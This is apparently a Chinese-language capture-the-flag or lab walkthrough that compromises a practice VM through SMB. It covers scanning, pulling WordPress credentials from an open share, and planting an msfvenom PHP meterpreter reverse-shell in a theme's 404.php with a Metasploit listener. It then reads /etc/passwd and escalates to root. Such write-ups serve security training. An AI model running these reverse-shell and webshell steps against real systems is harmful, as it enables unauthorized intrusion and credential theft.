SMB渗透

SMB渗透学习过程

1.SMB介绍

SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。SMB最初是IBM的贝瑞·费根鲍姆(Barry Feigenbaum)研制的,其目的是将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统。
百度百科
准备条件:kali 攻击机:192.168.31.101
靶场: 192.168.31.62

2.探测过程

(1)使用netdiscover -r 192.168.31.1/24(子网掩码)探测到局域网内的靶场地址为:192.168.31.62
(2)使用nmap -sV 192.168.31.62(靶场地址)探测靶场开放的服务
nmap指令详解
在这里插入图片描述nmap -A -v -T4 192.168.31.62在这里插入图片描述
针对smb协议弱点分析:使用smbclient -L 192.168.31.62
在这里插入图片描述
针对smb协议弱点分析
在这里插入图片描述
get deets.txt 到桌面,然后打开另一个终端,在桌面打开deets.txt

查看wp-config.php

cd/wordpress
get wp-config.php
gedit wp-config.php

在这里插入图片描述使用mysql尝试连接

mysql 192.168.31.62 -u Admin -p
password : 粘贴密码
ssh [email protected]
粘贴密码

两种方式都失败

又因开启了http协议则使用dirb http:192.168.31.62
找到wp-admin链接并打开
在这里插入图片描述
打开链接后使用账号密码登录,登录成功界面
在这里插入图片描述

制作webshell

在这里插入图片描述

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.31.101 lport=4444 -f raw

在这里插入图片描述
复制产生代码到本地

gedit shell.php

在这里插入图片描述

 启动监听
msfconsole

在这里插入图片描述

设置参数
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.31.101 (攻击机地址)
run

在这里插入图片描述
启动成功,等待连接
在这里插入图片描述
上传webshell代码

在这里插入图片描述
提交后浏览器输入访问点

192.168.31.62/wordpress/wp-content/themes/twentyfifteen/404.php

连接成功:在这里插入图片描述

在这里插入图片描述在这里插入图片描述

cat /etc/passwd

在这里插入图片描述
发现togie用户
切换到togie用户,密码为12345

在这里插入图片描述
提升权限
查找flag
在这里插入图片描述
视频教程链接

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章